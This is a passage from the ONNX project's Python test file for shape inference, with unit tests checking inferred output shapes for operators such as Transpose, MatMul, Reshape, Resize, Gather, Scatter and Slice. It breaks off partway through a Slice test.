| 42.826087 | 88 | 0.606236 | 821 | 6,895 | 4.738124 | 0.149817 | 0.056555 | 0.033933 | 0.046272 | 0.831105 | 0.791517 | 0.772751 | 0.754499 | 0.724165 | 0.69126 | 0 | 0.017864 | 0.285569 | 6,895 | 160 | 89 | 43.09375 | 0.771823 | 0.059173 | 0 | 0.503817 | 0 | 0 | 0.186617 | 0.098121 | 0 | 0 | 0 | 0 | 0.030534 | 1 | 0.114504 | false | 0 | 0.053435 | 0 | 0.175573 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a5b01d7cd6d186cd3eeaeb0b688b99aa3b3dafe | 184,951 | py | Python | onnx/test/shape_inference_test.py | jaeyounkim/onnx | aa0f464044b1badeb27d2ef86f96066f9bed97a9 | [
"Apache-2.0"
] | null | null | null | onnx/test/shape_inference_test.py | jaeyounkim/onnx | aa0f464044b1badeb27d2ef86f96066f9bed97a9 | [
"Apache-2.0"
] | null | null | null | onnx/test/shape_inference_test.py | jaeyounkim/onnx | aa0f464044b1badeb27d2ef86f96066f9bed97a9 | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from onnx import checker, helper, TensorProto, NodeProto, GraphProto, ValueInfoProto, ModelProto, ONNX_ML, SparseTensorProto
from onnx.defs import ONNX_DOMAIN, ONNX_ML_DOMAIN, AI_ONNX_PREVIEW_TRAINING_DOMAIN
from onnx.helper import make_node, make_tensor, make_tensor_value_info, make_empty_tensor_value_info, make_opsetid, make_sequence_value_info
from typing import Sequence, Union, Text, Tuple, List, Any, Optional
import onnx.shape_inference
import unittest
import os
import numpy as np # type: ignore
class TestShapeInference(unittest.TestCase):
def _make_graph(self,
seed_values, # type: Sequence[Union[Text, Tuple[Text, TensorProto.DataType, Any]]]
nodes, # type: List[NodeProto]
value_info, # type: List[ValueInfoProto]
initializer=None # type: Optional[Sequence[TensorProto]]
): # type: (...) -> GraphProto
if initializer is None:
initializer = []
names_in_initializer = set(x.name for x in initializer)
input_value_infos = []
# If the starting values are not also initializers,
# introduce the starting values as the output of reshape,
# so that the sizes are guaranteed to be unknown
for seed_value in seed_values:
if isinstance(seed_value, tuple):
seed_name, proto_type = seed_value[:2]
seed_value_info = make_tensor_value_info(*seed_value)
else:
seed_name, proto_type = seed_value, TensorProto.UNDEFINED
seed_value_info = make_empty_tensor_value_info(seed_value)
if seed_name in names_in_initializer:
input_value_infos.append(seed_value_info)
else:
value_info.append(seed_value_info)
input_value_infos.append(make_tensor_value_info('SEED_' + seed_name, proto_type, ()))
input_value_infos.append(make_tensor_value_info('UNKNOWN_SHAPE_' + seed_name, TensorProto.INT64, ()))
nodes[:0] = [make_node("Reshape", ['SEED_' + seed_name, 'UNKNOWN_SHAPE_' + seed_name], [seed_name])]
return helper.make_graph(nodes, "test", input_value_infos, [], initializer=initializer, value_info=value_info)
def _inferred(self, graph, **kwargs): # type: (GraphProto, **Any) -> ModelProto
kwargs[str('producer_name')] = 'onnx-test'
orig_model = helper.make_model(graph, **kwargs)
inferred_model = onnx.shape_inference.infer_shapes(orig_model, strict_mode=True)
checker.check_model(inferred_model)
return inferred_model
def _assert_inferred(self, graph, vis, **kwargs): # type: (GraphProto, List[ValueInfoProto], **Any) -> None
names_in_vis = set(x.name for x in vis)
vis = list(x for x in graph.value_info if x.name not in names_in_vis) + vis
inferred_model = self._inferred(graph, **kwargs)
inferred_vis = list(inferred_model.graph.value_info)
vis = list(sorted(vis, key=lambda x: x.name))
inferred_vis = list(sorted(inferred_vis, key=lambda x: x.name))
if vis == inferred_vis:
return
# otherwise some custom logic to give a nicer diff
vis_names = set(x.name for x in vis)
inferred_vis_names = set(x.name for x in inferred_vis)
assert vis_names == inferred_vis_names, (vis_names, inferred_vis_names)
for vi, inferred_vi in zip(vis, inferred_vis):
assert vi == inferred_vi, '\n%s\n%s\n' % (vi, inferred_vi)
assert False
def test_empty_graph(self): # type: () -> None
graph = self._make_graph(
['y'],
[], [])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def _identity_prop(self, op, **kwargs): # type: (Text, **Any) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5))],
[make_node(op, 'x', 'y', **kwargs)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (30, 4, 5))])
def test_transpose(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))])
def test_transpose_preexisting(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
[make_tensor_value_info("Y", TensorProto.FLOAT, None)])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))])
def test_transpose_partial(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
[make_tensor_value_info("Y", TensorProto.UNDEFINED, (3, "a", "b"))]) # type: ignore
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))])
def test_transpose_preexisting_incorrect_shape(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
[make_tensor_value_info("Y", TensorProto.FLOAT, (5, 5, 5))])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def test_transpose_preexisting_incorrect_type(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
[make_tensor_value_info("Y", TensorProto.STRING, (3, 2, 4))])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def _make_matmul_test_all_dims_known(self, shape1, shape2): # type: (Sequence[int], Sequence[int]) -> None
expected_out_shape = np.matmul(np.arange(np.product(shape1)).reshape(shape1),
np.arange(np.product(shape2)).reshape(shape2)).shape
graph = self._make_graph(
[('x', TensorProto.FLOAT, shape1),
('y', TensorProto.FLOAT, shape2)],
[make_node('MatMul', ['x', 'y'], ['z'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, expected_out_shape)])
def test_matmul_all_dims_known(self): # type: () -> None
self._make_matmul_test_all_dims_known((2,), (2,))
self._make_matmul_test_all_dims_known((4, 2), (2, 4))
self._make_matmul_test_all_dims_known((5, 2), (2, 4))
self._make_matmul_test_all_dims_known((5, 2), (2, 1))
self._make_matmul_test_all_dims_known((1, 2), (2, 3))
self._make_matmul_test_all_dims_known((2,), (2, 3))
self._make_matmul_test_all_dims_known((4, 2), (2,))
self._make_matmul_test_all_dims_known((1, 4, 2), (3, 2, 3))
self._make_matmul_test_all_dims_known((3, 4, 2), (3, 2, 3))
self._make_matmul_test_all_dims_known((5, 1, 4, 2), (1, 3, 2, 3))
self._make_matmul_test_all_dims_known((4, 2), (3, 2, 3))
def _make_matmul_test_allow_unknown(self, shape1, shape2, expected_out_shape): # type: (Any, Any, Any) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, shape1),
('y', TensorProto.FLOAT, shape2)],
[make_node('MatMul', ['x', 'y'], ['z'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, expected_out_shape)])
def test_matmul_allow_unknown(self): # type: () -> None
self._make_matmul_test_allow_unknown((None,), (None,), ())
self._make_matmul_test_allow_unknown((3,), (None,), ())
self._make_matmul_test_allow_unknown((2,), (2, "a"), ("a",))
self._make_matmul_test_allow_unknown((4, 2), (2, "a"), (4, "a"))
self._make_matmul_test_allow_unknown((4, None), (2, "a"), (4, "a"))
self._make_matmul_test_allow_unknown((4, None), (None, "a"), (4, "a"))
self._make_matmul_test_allow_unknown((1, 4, 2), ("a", 2, 5), ("a", 4, 5))
self._make_matmul_test_allow_unknown((1, 3, 4, 2), ("a", 2, 5), (1, 3, 4, 5))
self._make_matmul_test_allow_unknown((3,), None, None)
self._make_matmul_test_allow_unknown(None, None, None)
def test_cast(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 4, 3))],
[make_node("Cast", ["x"], ["y"], to=TensorProto.UINT8)],
[])
self._assert_inferred(graph, [make_tensor_value_info("y", TensorProto.UINT8, (2, 4, 3))])
def test_concat(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 4, 3)),
("y", TensorProto.FLOAT, (7, 4, 3))],
[make_node("Concat", ['x', 'y'], ['z'], axis=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (9, 4, 3))])
def test_concat_missing_shape(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 4, 3)),
"y",
("z", TensorProto.FLOAT, (None, None, None))],
[make_node("Concat", ['x', 'y', 'z'], ['out'], axis=0)],
[])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def test_concat_3d_axis_2(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('y', TensorProto.FLOAT, (2, 2, 2))],
[make_node('Concat', ['x', 'y'], ['z'], axis=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 2, 4))])
def test_concat_param(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, ("a", 2)),
("y", TensorProto.FLOAT, ("a", 3))],
[make_node("Concat", ['x', 'y'], ['z'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ("a", 5))])
def test_concat_param_single_input(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, ("a", 2))],
[make_node("Concat", ['x'], ['z'], axis=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ("a", 2))])
def test_reshape_dynamic_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (2, 4, 3)),
('shape', TensorProto.INT64, (2,))],
[make_node("Reshape", ['x', 'shape'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, None)])
def test_reshape_static_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (2, 4, 3)),
('shape', TensorProto.INT64, (2,))],
[make_node("Reshape", ['x', 'shape'], ['y'])],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (2,), (3, 8))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (3, 8))])
def test_reshape_static_shape_inferred(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (2, 4, 3)),
('shape', TensorProto.INT64, (3,))],
[make_node("Reshape", ['x', 'shape'], ['y'])],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (3,), (0, 3, -1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (2, 3, 4))])
def test_reshape_static_shape_zero(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (1, 1, 1)),
('shape', TensorProto.INT64, (3,))],
[make_node("Reshape", ['x', 'shape'], ['y'])],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (3,), (0, 1, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (1, 1, 1))])
def test_reshape_static_shape_allowzero(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (1, 0, 0)),
('shape', TensorProto.INT64, (3,))],
[make_node("Reshape", ['x', 'shape'], ['y'], allowzero=1)],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (3,), (0, 1, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (0, 1, 1))])
def test_reshape_static_shape_constant(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (2, 4, 3))],
[make_node("Constant", [], ['shape'],
value=make_tensor('shape', TensorProto.INT64, (2,), (3, 8))),
make_node("Reshape", ['x', 'shape'], ['y'])],
[])
self._assert_inferred(graph, [
make_tensor_value_info('shape', TensorProto.INT64, (2,)),
make_tensor_value_info('y', TensorProto.UINT8, (3, 8))])
def test_upsample(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (2, 4, 3, 5)),
('scales', TensorProto.FLOAT, (4,))],
[make_node("Upsample", ['x', 'scales'], ['y'])],
[],
initializer=[make_tensor('scales', TensorProto.FLOAT, (4,), (1.0, 1.1, 1.3, 1.9))])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (2, 4, 3, 9))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_upsample_raw_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (2, 4, 3, 5)),
('scales', TensorProto.FLOAT, (4,))],
[make_node("Upsample", ['x', 'scales'], ['y'])],
[],
initializer=[make_tensor('scales', TensorProto.FLOAT, (4,),
vals=np.array([1.0, 1.1, 1.3, 1.9], dtype='<f4').tobytes(), raw=True)]) # Feed raw bytes (force little endian ordering like onnx standard) for test purpose
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (2, 4, 3, 9))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_upsample_raw_data_v7(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (1, 3, 4, 5))],
[make_node("Upsample", ['x'], ['y'], scales=[2.0, 1.1, 2.3, 1.9])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (2, 3, 9, 9))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 7)])
def test_expand(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (3, 1)),
('shape', TensorProto.INT64, (3,))],
[make_node("Expand", ['x', 'shape'], ['y'])],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (3,), (2, 1, 6))])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (2, 3, 6))])
def test_expand_scalar_input(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, ()),
('shape', TensorProto.INT64, (2,))],
[make_node("Expand", ['x', 'shape'], ['y'])],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (2,), (4, 8))])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (4, 8))])
def test_expand_raw_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (3, 1)),
('shape', TensorProto.INT64, (2,))],
[make_node("Expand", ['x', 'shape'], ['y'])],
[],
initializer=[make_tensor('shape', TensorProto.INT64, (2,),
vals=np.array([3, 4], dtype='<i8').tobytes(), raw=True)]) # Feed raw bytes (force little endian ordering like onnx standard) for test purpose
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (3, 4))])
def test_resize_size(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (2, 4, 3, 5)),
('roi', TensorProto.FLOAT, (8,)),
('scales', TensorProto.FLOAT, (4,)),
('sizes', TensorProto.INT64, (4,))],
[make_node("Resize", ['x', 'roi', 'scales', 'sizes'], ['y'])],
[],
initializer=[make_tensor('sizes', TensorProto.INT64, (4,), (3, 5, 6, 7))])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (3, 5, 6, 7))])
def test_resize_scale(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (2, 4, 3, 5)),
('roi', TensorProto.FLOAT, (8,)),
('scales', TensorProto.FLOAT, (4,))],
[make_node("Resize", ['x', 'roi', 'scales'], ['y'])],
[],
initializer=[make_tensor('scales', TensorProto.FLOAT, (4,), (1.0, 1.1, 1.3, 1.9))])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (2, 4, 3, 9))])
def test_resize_scale_raw_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (1, 3, 4, 5)),
('roi', TensorProto.FLOAT, (8,)),
('scales', TensorProto.FLOAT, (4,))],
[make_node("Resize", ['x', 'roi', 'scales'], ['y'])],
[],
initializer=[make_tensor('scales', TensorProto.FLOAT, (4,),
vals=np.array([2.0, 1.1, 2.3, 1.9], dtype='<f4').tobytes(), raw=True)])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.INT32, (2, 3, 9, 9))])
def test_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 4, 3))],
[make_node("Shape", ['x'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (3,))])
def test_size(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 4, 3))],
[make_node("Size", ['x'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, ())])
def test_gather(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 3)),
('i', TensorProto.INT64, (2,))],
[make_node("Gather", ['x', 'i'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3))]) # type: ignore
def test_gather_axis1(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 3, 5)),
('i', TensorProto.INT64, (1, 2))],
[make_node("Gather", ['x', 'i'], ['y'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 1, 2, 5))]) # type: ignore
def test_gather_into_scalar(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3,)),
('i', TensorProto.INT64, ())],
[make_node("Gather", ['x', 'i'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ())])
def test_gather_elements(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2)),
('i', TensorProto.INT64, (2, 2))],
[make_node("GatherElements", ['x', 'i'], ['y'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))]) # type: ignore
def test_gather_elements_axis0(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 3)),
('i', TensorProto.INT64, (2, 3))],
[make_node("GatherElements", ['x', 'i'], ['y'], axis=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3))]) # type: ignore
def test_scatter(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 3)),
('i', TensorProto.INT64, (2, 3)),
('u', TensorProto.FLOAT, (2, 3))],
[make_node("Scatter", ['x', 'i', 'u'], ['y'])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 3))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)]) # type: ignore
def test_scatter_axis1(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, 5)),
('i', TensorProto.INT64, (1, 2)),
('u', TensorProto.FLOAT, (1, 2))],
[make_node("Scatter", ['x', 'i', 'u'], ['y'], axis=1)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (1, 5))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)]) # type: ignore
def test_scatter_elements(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 3)),
('i', TensorProto.INT64, (2, 3)),
('u', TensorProto.FLOAT, (2, 3))],
[make_node("ScatterElements", ['x', 'i', 'u'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 3))]) # type: ignore
def test_scatter_elements_axis1(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, 5)),
('i', TensorProto.INT64, (1, 2)),
('u', TensorProto.FLOAT, (1, 2))],
[make_node("ScatterElements", ['x', 'i', 'u'], ['y'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 5))]) # type: ignore
def test_scatternd(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('indices', TensorProto.INT64, (3, 3, 2)),
('updates', TensorProto.FLOAT, (3, 3, 6))],
[make_node("ScatterND", ['x', 'indices', 'updates'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 5, 6))]) # type: ignore
def test_scatternd_noshape(self): # type: () -> None
# The shape of 'x_reshaped' cannot be inferred, since it is the output of a dynamic reshape.
# Thus the shape of 'y' is also None.
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('indices', TensorProto.INT64, (3, 3, 2)),
('updates', TensorProto.FLOAT, (3, 3, 6)),
('shape', TensorProto.INT64, (2,))],
[make_node("Reshape", ['x', 'shape'], ['x_reshaped']),
make_node("ScatterND", ['x_reshaped', 'indices', 'updates'], ['y'])],
[])
self._assert_inferred(graph, [
make_tensor_value_info('x_reshaped', TensorProto.FLOAT, None),
make_tensor_value_info('y', TensorProto.FLOAT, None)]) # type: ignore
def test_squeeze(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, 3, 1, 1, 2, 1)),
('axes', TensorProto.INT64, (4,))],
[make_node('Squeeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (4,), (0, 2, 3, 5))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 2))])
def test_unsqueeze_regular(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('axes', TensorProto.INT64, (4,))],
[make_node('Unsqueeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (4,), (0, 1, 3, 5))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 1, 3, 1, 2, 1))])
def test_unsqueeze_unsorted_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('axes', TensorProto.INT64, (2,))],
[make_node('Unsqueeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (2,), (4, 0))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 3, 4, 5, 1))])
def test_unsqueeze_negative_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('axes', TensorProto.INT64, (2,))],
[make_node('Unsqueeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (2,), (0, -1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 3, 4, 5, 1))])
def test_slice_without_input_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)), ('starts', TensorProto.INT64, (1,)), ('ends', TensorProto.INT64, (1,))],
[make_node('Slice', ['x', 'starts', 'ends'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, None)])
def test_slice_with_input_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)), ('starts', TensorProto.INT64, (2, )), ('ends', TensorProto.INT64, (2, ))],
[make_node('Slice', ['x', 'starts', 'ends'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2, ),
vals=np.array([1, 0], dtype='<i8').tobytes(), raw=True), # Feed raw bytes (force little endian ordering like onnx standard) for test purpose
make_tensor('ends', TensorProto.INT64, (2, ), (2, 2))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 2))])
def test_slice_with_input_shape_containing_dim_params(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, 'a', 1)),
('starts', TensorProto.INT64, (3,)),
('ends', TensorProto.INT64, (3,))],
[make_node('Slice', ['x', 'starts', 'ends'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (3,), (0, 0, 0)),
make_tensor('ends', TensorProto.INT64, (3,), (1, 1, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, None, 1))]) # type: ignore
def test_slice_with_input_shape_steps(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7)),
('starts', TensorProto.INT64, (3,)),
('ends', TensorProto.INT64, (3,)),
('axes', TensorProto.INT64, (None)),
('steps', TensorProto.INT64, (3,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (3,), (1, 0, 0)),
make_tensor('ends', TensorProto.INT64, (3,), (2, 6, 6)),
make_tensor('steps', TensorProto.INT64, (3,), (1, 4, 3))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 2, 2))])
def test_slice_with_input_shape_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 6, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,)),
('steps', TensorProto.INT64, (None))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (2, 2)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 2))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 6, 2))])
def test_slice_unsorted_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (2, 2)),
make_tensor('axes', TensorProto.INT64, (2,), (1, 0))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 1))]) # can handle unsorted axes
def test_slice_giant_number(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (200, 22000)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))])
def test_slice_giant_step(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,)),
('steps', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (200, 200)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1)),
make_tensor('steps', TensorProto.INT64, (2,), (1, 200))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 1))])
def test_slice_negative_end(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (200, -1)), # negative end means begin from end of a dimension (here end = 2 - 1 = 1)
make_tensor('axes', TensorProto.INT64, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 1))]) # type: ignore
def test_slice_negative_start(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, -2)), # negative start means begin from end of a dimension (here end = 2 - 2 = 0)
make_tensor('ends', TensorProto.INT64, (2,), (200, 3)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))]) # type: ignore
def test_slice_negative_step(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,)),
('steps', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], 'y')],
[],
